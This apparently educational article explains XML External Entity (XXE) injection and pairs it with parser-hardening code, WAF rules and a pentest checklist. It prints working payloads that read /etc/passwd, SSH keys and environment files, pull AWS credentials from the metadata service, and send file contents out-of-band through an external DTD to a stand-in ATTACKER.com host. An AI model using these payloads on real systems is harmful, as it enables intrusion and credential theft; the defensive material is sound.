XXE - XML External Entity Injection - Definition & Explanation

XXE is one of the most insidious web vulnerabilities because it often occurs in hidden XML processing paths: upload endpoints, SOAP services, SVG files, Office documents, and REST APIs with XML support. An attacker who finds XXE in an internal system can use it to read cloud credentials from the instance metadata service and, depending on the permissions attached to those credentials, compromise large parts of the AWS environment.

XXE Basic Principle

Normal XML Entities

<!DOCTYPE note [
  <!ENTITY name "Alice">
]>
<note>
  <to>&name;</to>
</note>

&name; expands to "Alice"—completely harmless.
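
The expansion can be observed with any parser that processes the internal DTD subset. The following is a minimal sketch, assuming CPython's standard-library `xml.etree.ElementTree`; the helper name `recipient` is made up for this illustration.

```python
import xml.etree.ElementTree as ET

# Same document as above: one internal entity declared in the DOCTYPE.
NOTE_XML = """<!DOCTYPE note [
  <!ENTITY name "Alice">
]>
<note>
  <to>&name;</to>
</note>"""


def recipient(xml_text: str) -> str:
    """Return the text of <to> after the parser has expanded entities.

    Hypothetical helper for illustration only.
    """
    root = ET.fromstring(xml_text)
    return root.findtext("to")


print(recipient(NOTE_XML))  # prints: Alice
```

The entity value is fixed inside the document itself, so nothing outside the XML is read.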

External Entity – The Problem

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>

The parser reads /etc/passwd and substitutes its content for &xxe;. If the application echoes the parsed value, the server returns the content of /etc/passwd in the response.

Why Is This Possible?

The XML standard allows external entities
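Many XML parsers enable external entities by default, or did so in older versions:
Java (JAXP SAX and DOM parsers): external entities are enabled by default and must be disabled explicitly
libxml2: entity substitution was enabled by default before version 2.9; newer versions require the application to opt in (for example via XML_PARSE_NOENT)
.NET XmlDocument: insecure by default before .NET Framework 4.5.2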
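
Because defaults differ between parsers and versions, it helps to check the behavior of the parser actually in use. The sketch below is one such probe, assuming CPython's standard-library `xml.etree.ElementTree`, which is documented to raise a `ParseError` instead of resolving external entities. The function name `external_entity_rejected` is an illustrative assumption, and the result says nothing about other parsers such as lxml.

```python
import xml.etree.ElementTree as ET

# Classic probe document with one external (SYSTEM) entity.
XXE_XML = """<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<foo>&xxe;</foo>"""


def external_entity_rejected(xml_text: str) -> bool:
    """Return True if the parser refuses the document (hypothetical helper).

    ElementTree does not fetch the external resource; the reference to the
    external entity surfaces as a ParseError instead.
    """
    try:
        ET.fromstring(xml_text)
    except ET.ParseError:
        return True
    return False
```

A `True` result for the probe only shows that this parser, in this configuration, does not expand the entity; explicit hardening is still the safer choice.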

XXE Payloads

File Reading (Linux)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<stockCheck>
  <productId>&xxe;</productId>
  <storeId>1</storeId>
</stockCheck>

Typical Target Files:

Path	Content
`file:///etc/passwd`	User accounts
`file:///etc/shadow`	Password hashes (if accessible!)
`file:///etc/hosts`	Internal hostnames
`file:///proc/self/environ`	Environment variables (API keys!)
`file:///home/user/.ssh/id_rsa`	SSH private keys
`file:///var/www/html/config.php`	Database passwords

File Reading (Windows)

file:///C:/Windows/system32/drivers/etc/hosts
file:///C:/inetpub/wwwroot/web.config - IIS configuration
file:///C:/Users/Administrator/.ssh/id_rsa

AWS Credentials via XXE + SSRF

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://169.254.169.254/latest/meta-data/iam/security-credentials/EC2Role">
]>
<foo>&xxe;</foo>

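This reads temporary AWS credentials for the role EC2Role (a placeholder for the instance's actual role name) from the EC2 Instance Metadata Service (IMDS). It is a critical finding in AWS environments, because the attacker gains every permission attached to that role. The request only works against IMDSv1; IMDSv2 requires a session token obtained through a PUT request, which an external entity fetch cannot send.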

Blind XXE: if the response does not reflect the entity value, the attacker can still exfiltrate data out-of-band (OOB).

Proof of XXE Vulnerability:

<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "http://ATTACKER-SERVER.com/test?data=">
]>
<foo>&xxe;</foo>

The attacker’s server receives an HTTP request as proof.
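
For an authorized test, the receiving side can be as small as an HTTP server that records every request path. The following is a minimal sketch using only Python's standard library; `CallbackHandler`, `start_listener`, `simulate_parser_fetch`, and the `hits` list are names invented for this example, and the simulated fetch merely stands in for the vulnerable parser resolving the SYSTEM URL.

```python
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

# Every request the listener sees is recorded here as (client_ip, path).
hits = []


class CallbackHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        # The path includes the query string, e.g. "/test?data=".
        hits.append((self.client_address[0], self.path))
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, format, *args):
        pass  # suppress the default stderr access log


def start_listener(host="127.0.0.1", port=0):
    """Start the listener in a background thread; port 0 picks a free port."""
    server = HTTPServer((host, port), CallbackHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server


def simulate_parser_fetch(port, path="/test?data="):
    """Stand-in for the vulnerable parser fetching the external entity URL."""
    conn = http.client.HTTPConnection("127.0.0.1", port, timeout=5)
    conn.request("GET", path)
    conn.getresponse().read()
    conn.close()
```

In a real engagement the listener would bind to a publicly reachable address, and any entry in `hits` coming from the target's IP range would serve as the proof described above.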

External DTD on attacker’s server (evil.dtd):

<!ENTITY % file SYSTEM "file:///etc/passwd">
<!ENTITY % eval "<!ENTITY &#x25; exfil SYSTEM 'http://ATTACKER.com/?data=%file;'>">
%eval;
%exfil;

Payload to target system:

<!DOCTYPE foo [
  <!ENTITY % remote SYSTEM "http://ATTACKER.com/evil.dtd">
  %remote;
]>
<foo>trigger</foo>

XXE via SVG Upload

SVG files are XML. Upload endpoints for "Upload Avatar" or "Thumbnail" are frequently affected:

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg xmlns="http://www.w3.org/2000/svg">
  <text>&xxe;</text>
</svg>

When the SVG is rendered, the hostname appears in the image.

XXE via XLSX/DOCX Upload

Office documents are ZIP archives containing XML files. To manipulate them:

```bash
# 1. Unzip the original file:
unzip doc.docx -d doc/
# 2. Add XXE payload to [Content_Types].xml
# 3. Repack from inside the directory so the archive paths stay at the top level:
(cd doc && zip -r ../evil.docx .)
```

XXE in SOAP Web Services

POST /soap/service HTTP/1.1
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE foo [
  <!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<soap:Envelope xmlns:soap="...">
  <soap:Body>
    <getUser>
      <username>&xxe;</username>
    </getUser>
  </soap:Body>
</soap:Envelope>

XXE Mitigation Measures

Configure the parser securely

Java (SAXParser, DocumentBuilder):

DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();

// Disable external entities:
factory.setFeature("http://apache.org/xml/features/disallow-doctype-decl", true);
// OR more granularly:
factory.setFeature("http://xml.org/sax/features/external-general-entities", false);
factory.setFeature("http://xml.org/sax/features/external-parameter-entities", false);
factory.setFeature("http://apache.org/xml/features/nonvalidating/load-external-dtd", false);
factory.setXIncludeAware(false);
factory.setExpandEntityReferences(false);

DocumentBuilder builder = factory.newDocumentBuilder();

Python (defusedxml) - recommended:

# DO NOT USE: lxml.etree.parse(file) with default settings - XXE-vulnerable!
# GOOD: Use defusedxml:
import defusedxml.ElementTree as ET
# Rejects entity declarations (XXE, Billion Laughs) by default;
# pass forbid_dtd=True to also reject any DTD.
tree = ET.parse(file)

Python (lxml) - explicitly configured:

from lxml import etree
parser = etree.XMLParser(
    resolve_entities=False,
    no_network=True,
    load_dtd=False
)
tree = etree.parse(file, parser)

PHP:

// libxml_disable_entity_loader() is deprecated as of PHP 8.0, where external entity loading is disabled by default.
// PHP 7.x:
libxml_disable_entity_loader(true);

// PHP 8.0+: external entities are disabled by default!
// Nevertheless: use the LIBXML_NONET flag, and do not pass LIBXML_NOENT or LIBXML_DTDLOAD:
$dom = new DOMDocument();
$dom->loadXML($xml, LIBXML_NONET);

.NET (XmlDocument, XmlReader):

// Insecure (< .NET 4.5.2):
XmlDocument unsafeDoc = new XmlDocument();
unsafeDoc.Load(xmlInput);  // Vulnerable to XXE!

// Safe:
XmlDocument safeDoc = new XmlDocument();
safeDoc.XmlResolver = null;  // Disable external resolvers
safeDoc.Load(xmlInput);

// XmlReader (safer by default since .NET 4.5.2):
XmlReaderSettings settings = new XmlReaderSettings();
settings.DtdProcessing = DtdProcessing.Prohibit;
settings.XmlResolver = null;
using XmlReader reader = XmlReader.Create(input, settings);

NGINX / WAF Level:

SecRule REQUEST_BODY "@rx SYSTEM\s*[\"']" \
  "id:1001,phase:2,t:none,deny,status:400,msg:'XXE Attempt'"

SecRule REQUEST_BODY "@rx <!ENTITY" \
  "id:1002,phase:2,t:none,deny,status:400,msg:'XXE Entity Declaration'"

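To see what these two patterns do and do not catch, they can be reproduced outside the WAF. The following is a rough sketch in Python that mirrors the regular expressions of the rules above; the function name `waf_would_block` is an assumption for this illustration, and the code does not model any other ModSecurity behavior such as transformations or body parsing.

```python
import re

# Same patterns as the two rules above.
SYSTEM_ID = re.compile(r"SYSTEM\s*[\"']")
ENTITY_DECL = re.compile(r"<!ENTITY")


def waf_would_block(body: str) -> bool:
    """Return True if either pattern matches the request body (hypothetical helper)."""
    return bool(SYSTEM_ID.search(body) or ENTITY_DECL.search(body))


payload = '<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/passwd">]><foo>&xxe;</foo>'

# The plain payload matches both patterns.
blocked_plain = waf_would_block(payload)

# The same payload sent as UTF-16 has a NUL byte between the characters,
# so a byte-oriented pattern match no longer sees "SYSTEM" or "<!ENTITY".
blocked_utf16 = waf_would_block(payload.encode("utf-16").decode("latin-1"))
```

The second case is why pattern-based filtering is best treated as defense in depth on top of a securely configured parser, not as a replacement for it.
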
Design Recommendations

Use JSON instead of XML where possible (JSON has no entity problem)
SVG upload: convert to PNG/JPG on the server side (Pillow/ImageMagick)
Office document parsers: use specialized libraries (Apache POI, python-docx) instead of parsing the XML directly
Input validation: check Content-Type and magic bytes
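
As an additional validation step for uploads, files can be rejected as soon as they declare a DOCTYPE, before any full-featured parser touches them. The sketch below is one possible approach using only Python's standard library (`xml.parsers.expat` and `zipfile`); the names `DoctypeFound`, `xml_is_acceptable`, and `suspicious_office_parts` are invented for this example, and a production check would also need size limits for the ZIP members.

```python
import io
import zipfile
from xml.parsers import expat


class DoctypeFound(Exception):
    """Raised from the expat callback as soon as a DOCTYPE is seen."""


def xml_is_acceptable(data: bytes) -> bool:
    """Return True only for well-formed XML without a DOCTYPE declaration."""

    def on_doctype(name, sysid, pubid, has_internal_subset):
        # Abort parsing immediately; no entity is ever resolved.
        raise DoctypeFound(name)

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(data, True)
    except (DoctypeFound, expat.ExpatError):
        return False
    return True


def suspicious_office_parts(archive: bytes) -> list[str]:
    """List XML parts of a DOCX/XLSX archive that fail xml_is_acceptable()."""
    flagged = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for info in zf.infolist():
            # Assumption: only .xml and .rels members are parsed as XML.
            if info.filename.endswith((".xml", ".rels")):
                if not xml_is_acceptable(zf.read(info)):
                    flagged.append(info.filename)
    return flagged
```

Rejecting every DOCTYPE is deliberately strict: some legitimate SVG files exported by older tools carry one and would be refused, which is usually an acceptable trade-off for user uploads.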

XXE Testing

Pentest Procedure

Step 1 - Identify XML input points:

All endpoints with Content-Type: application/xml / text/xml
Upload endpoints (SVG, DOCX, XLSX, XML)
SOAP endpoints
JSON APIs with optional XML support (Accept: application/xml)

Step 2 - Test the basic payload:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "http://BURP-COLLABORATOR.net/test">
]>
<xml>&xxe;</xml>

Does a DNS lookup or HTTP request arrive at the Collaborator?
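
When the probe is sent from a script instead of an intercepting proxy, the request can be assembled as follows. This is a minimal sketch using Python's standard-library `urllib`; the function name `build_probe` and both example URLs are placeholders, and the probe should only ever be sent to systems that are in scope for an authorized test.

```python
import urllib.request


def build_probe(endpoint: str, callback_url: str) -> urllib.request.Request:
    """Build (but do not send) a POST request carrying the basic XXE probe.

    Hypothetical helper: `callback_url` is the tester's own OOB endpoint.
    """
    body = (
        '<?xml version="1.0"?>\n'
        f'<!DOCTYPE foo [<!ENTITY xxe SYSTEM "{callback_url}">]>\n'
        "<xml>&xxe;</xml>"
    )
    return urllib.request.Request(
        endpoint,
        data=body.encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )


# Placeholder values; nothing is sent until urlopen() is called.
probe = build_probe("https://target.example/api", "http://callback.example/test")
```

Sending it is a single call to `urllib.request.urlopen(probe, timeout=10)`; the interesting result is then the callback log, not the HTTP response.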

Step 3 - Attempt file reading:

<!DOCTYPE foo [<!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<xml>&xxe;</xml>

Is the hostname visible in the response?

Step 4 - Check for blind XXE:

If no direct output appears, attempt OOB exfiltration. interactsh is suitable as a callback server.

Step 5 - Automated Tools:

nuclei -t nuclei-templates/vulnerabilities/xxe/ -u https://target.com

Burp Pro: automatic XXE detection in Active Scan with Burp Collaborator as OOB proof.